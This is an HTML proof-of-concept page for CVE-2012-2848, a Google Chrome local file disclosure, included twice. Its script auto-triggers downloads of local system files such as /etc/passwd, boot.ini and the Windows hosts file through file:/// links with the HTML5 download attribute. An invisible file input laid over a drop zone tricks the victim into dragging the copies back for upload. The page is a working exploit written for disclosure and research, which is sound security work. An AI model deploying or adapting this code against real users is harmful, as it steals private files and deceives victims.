matt-/CVE-2012-2848.html

## CVE-2012-2848.html

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>Google Chrome "Local File Disclosure" via HTML5 Link Download with DND Upload POC</title>
<style>

html, body {
  height: 100%;
}
.wrapper {
	min-height: 100%;
	height: auto !important;
	height: 100%;
	margin: 0 auto -140px;
}

.footer, .push {
	height: 4em;
}

body
{
	font-family: "Segoe UI", Tahoma, Helvetica, freesans, sans-serif;
	font-size: 80%;
	margin: 10px;
	color: #333;
	background-color: #fff;
}

h1, h2
{
	font-size: 1.5em;
	font-weight: normal;
}

h2
{
	font-size: 1.3em;
}

#filedrag
{
	font-weight: bold;
	text-align: center;
	padding: 1em 0;
	color: #555;
	border: 2px dashed #555;
	border-radius: 7px;
	cursor: default;
	width:80%;
	margin:0px auto;
	line-height: 100px;
}

#filedrag.hover
{
	color: #f00;
	border-color: #f00;
	border-style: solid;
	box-shadow: inset 0 3px 4px #888;
}


a{
	color: #369;
}

pre
{
	font-family: monospace;
	font-size: 0.9em;
	padding: 1px 2px;
	margin: 0 0 1em auto;
	border: 1px inset #666;
	background-color: #eee;
}

</style>

<script>
var has_run = false;
// getElementById
function $id(id) {
	return document.getElementById(id);
}

function send_file(n){
	var dl_link = document.createElement('a');
	document.body.appendChild(dl_link);

	dl_link.setAttribute('href', n)
	var evt = document.createEvent("MouseEvents");
	dl_link.setAttribute('download', 'file_'+new Date().getTime()+'.txt');
	evt.initMouseEvent("click", true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
	dl_link.dispatchEvent(evt);
}

function init(){
	send_file('file.txt');
	// "file:///C:/boot.ini"
	// start a file donwload:

	var fileselect = $id("fileselect");
	fileselect.addEventListener("change", function(e){
		// fetch FileList object

		var files = e.target.files || e.dataTransfer.files;

		// process all File objects
		for (var i = 0, f; f = files[i]; i++) {
			reader = new FileReader();
			n = f.name;
			reader.onload = function(e) {


				if(!has_run){
					//$id('progress').innerHTML += '<br>Now Lets try a local file. ';
					alert('Now Lets try a local file. ');
					$id('progress').innerHTML = 'On to step 3. Drag the new file below into the box above.';
					// we can get a directory listing and do really bad things...
					//send_file("file:////Users/");
					send_file("file:////etc/passwd");
					send_file("file:///C:/boot.ini");
					// no boot.ini on win7?
					send_file("file:///C:/Windows/System32/drivers/etc/hosts");
					has_run = true;
				}
				else{
					$id('progress').innerHTML = "<p>Contents of: <strong>" + n + ": </strong>(the attack would then use ajax to upload the file)</p><pre>" +
					e.target.result.replace(/</g, "&lt;").replace(/>/g, "&gt;") +
					"</pre>";
				}

			}
			reader.readAsText(f);
		}


	}, false);
}


</script>

</head>
    <body onload="//init()">
		<div class="wrapper" id="content">
			<h1>Google Chrome "Local File Disclosure" via HTML5 Link Download with DND Upload POC</h1>

			<p>This is a demonstration of a local file "download" via the HTML5 download attribute. A link is created using a file:/// url. The HTML5 "download" attribute is set to name the download file. This allows the attacker to effectively copy any file the user has access to into the downloads directory and rename it. In this example the victim would then be tricked into dragging the file back into an HTML5 Drop zone to upload the arbitrary file back to the server. </p><p>Note: If a tab has not opened a downloaded file yet the file:/// url will not work from a remote. In our example get the user to download a data: url first then a local file works as expected.</p>

			<h2>Instructions</h2>
			<p>
				<ol>
					<li>
						A file should automatically download. If it does not click <a href="file.txt" download="step1.txt">here</a>.</li>
					<li>Drag that file in to box below. (Some times shift+drag is required to download the file.)</li>
					<li>A second file should automatically download. If it does not try clicking
						<a href="file:///C:/boot.ini" download="step3.txt">Win XP,</a>
						<a href="file:///C:/Windows/System32/drivers/etc/hosts" download="step3.txt">Win 7,</a>
						<a href="file:////etc/hosts" download="step3.txt">OSX</a> or <a href="#" onclick="window.location.reload();">try to relaod</a> the page.</li>
					<li>Drag the second file into the box to show the source.</li>
				</ol>
			</p>
   			<br/><br/>

			<div style="width:80%; margin:0px auto;z-index:99999;" >
				<input type="file" style="opacity:0; width:100%; height:130px;z-index:99999;" id="fileselect" name="fileselect[]" multiple="multiple" />
			</div>

			<div id="filedrag" style=" margin:-130px auto;z-index:-1;">
				Drop file here!
			</div>
			<div id="progress" style="margin:140px"></div>


            <div class="push"></div>
        </div>
        <div class="footer">
            <img src="drag.png" />
<div style="float: right; padding-top: 100px;">POC by <a href="http://twitter.com/mattaustin">@Matt Austin</a> of <a href="http://m-austin.com">m-austin.com</a> and <a href="http://aspectsecurity.com">Aspect Security</a></div>
        </div>
<script>
	init();
</script>
    </body>
</html>

	<!DOCTYPE html>
	<html lang="en">
	<head>
	<meta charset="UTF-8" />
	<title>Google Chrome "Local File Disclosure" via HTML5 Link Download with DND Upload POC</title>
	<style>

	html, body {
	height: 100%;
	}
	.wrapper {
	min-height: 100%;
	height: auto !important;
	height: 100%;
	margin: 0 auto -140px;
	}

	.footer, .push {
	height: 4em;
	}

	body
	{
	font-family: "Segoe UI", Tahoma, Helvetica, freesans, sans-serif;
	font-size: 80%;
	margin: 10px;
	color: #333;
	background-color: #fff;
	}

	h1, h2
	{
	font-size: 1.5em;
	font-weight: normal;
	}

	h2
	{
	font-size: 1.3em;
	}

	#filedrag
	{
	font-weight: bold;
	text-align: center;
	padding: 1em 0;
	color: #555;
	border: 2px dashed #555;
	border-radius: 7px;
	cursor: default;
	width:80%;
	margin:0px auto;
	line-height: 100px;
	}

	#filedrag.hover
	{
	color: #f00;
	border-color: #f00;
	border-style: solid;
	box-shadow: inset 0 3px 4px #888;
	}


	a{
	color: #369;
	}

	pre
	{
	font-family: monospace;
	font-size: 0.9em;
	padding: 1px 2px;
	margin: 0 0 1em auto;
	border: 1px inset #666;
	background-color: #eee;
	}

	</style>

	<script>
	var has_run = false;
	// getElementById
	function $id(id) {
	return document.getElementById(id);
	}

	function send_file(n){
	var dl_link = document.createElement('a');
	document.body.appendChild(dl_link);

	dl_link.setAttribute('href', n)
	var evt = document.createEvent("MouseEvents");
	dl_link.setAttribute('download', 'file_'+new Date().getTime()+'.txt');
	evt.initMouseEvent("click", true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
	dl_link.dispatchEvent(evt);
	}

	function init(){
	send_file('file.txt');
	// "file:///C:/boot.ini"
	// start a file donwload:

	var fileselect = $id("fileselect");
	fileselect.addEventListener("change", function(e){
	// fetch FileList object

	var files = e.target.files \|\| e.dataTransfer.files;

	// process all File objects
	for (var i = 0, f; f = files[i]; i++) {
	reader = new FileReader();
	n = f.name;
	reader.onload = function(e) {



	if(!has_run){
	//$id('progress').innerHTML += '<br>Now Lets try a local file. ';
	alert('Now Lets try a local file. ');
	$id('progress').innerHTML = 'On to step 3. Drag the new file below into the box above.';
	// we can get a directory listing and do really bad things...
	//send_file("file:////Users/");
	send_file("file:////etc/passwd");
	send_file("file:///C:/boot.ini");
	// no boot.ini on win7?
	send_file("file:///C:/Windows/System32/drivers/etc/hosts");
	has_run = true;
	}
	else{
	$id('progress').innerHTML = "<p>Contents of: <strong>" + n + ": </strong>(the attack would then use ajax to upload the file)</p><pre>" +
	e.target.result.replace(/</g, "<").replace(/>/g, ">") +
	"</pre>";
	}

	}
	reader.readAsText(f);
	}


	}, false);
	}


	</script>

	</head>
	<body onload="//init()">
	<div class="wrapper" id="content">
	<h1>Google Chrome "Local File Disclosure" via HTML5 Link Download with DND Upload POC</h1>

	<p>This is a demonstration of a local file "download" via the HTML5 download attribute. A link is created using a file:/// url. The HTML5 "download" attribute is set to name the download file. This allows the attacker to effectively copy any file the user has access to into the downloads directory and rename it. In this example the victim would then be tricked into dragging the file back into an HTML5 Drop zone to upload the arbitrary file back to the server. </p><p>Note: If a tab has not opened a downloaded file yet the file:/// url will not work from a remote. In our example get the user to download a data: url first then a local file works as expected.</p>

	<h2>Instructions</h2>
	<p>
	<ol>
	<li>
	A file should automatically download. If it does not click <a href="file.txt" download="step1.txt">here</a>.</li>
	<li>Drag that file in to box below. (Some times shift+drag is required to download the file.)</li>
	<li>A second file should automatically download. If it does not try clicking
	<a href="file:///C:/boot.ini" download="step3.txt">Win XP,</a>
	<a href="file:///C:/Windows/System32/drivers/etc/hosts" download="step3.txt">Win 7,</a>
	<a href="file:////etc/hosts" download="step3.txt">OSX</a> or <a href="#" onclick="window.location.reload();">try to relaod</a> the page.</li>
	<li>Drag the second file into the box to show the source.</li>
	</ol>
	</p>
	<br/><br/>

	<div style="width:80%; margin:0px auto;z-index:99999;" >
	<input type="file" style="opacity:0; width:100%; height:130px;z-index:99999;" id="fileselect" name="fileselect[]" multiple="multiple" />
	</div>

	<div id="filedrag" style=" margin:-130px auto;z-index:-1;">
	Drop file here!
	</div>
	<div id="progress" style="margin:140px"></div>


	<div class="push"></div>
	</div>
	<div class="footer">
	<img src="drag.png" />
	<div style="float: right; padding-top: 100px;">POC by <a href="http://twitter.com/mattaustin">@Matt Austin</a> of <a href="http://m-austin.com">m-austin.com</a> and <a href="http://aspectsecurity.com">Aspect Security</a></div>
	</div>
	<script>
	init();
	</script>
	</body>
	</html>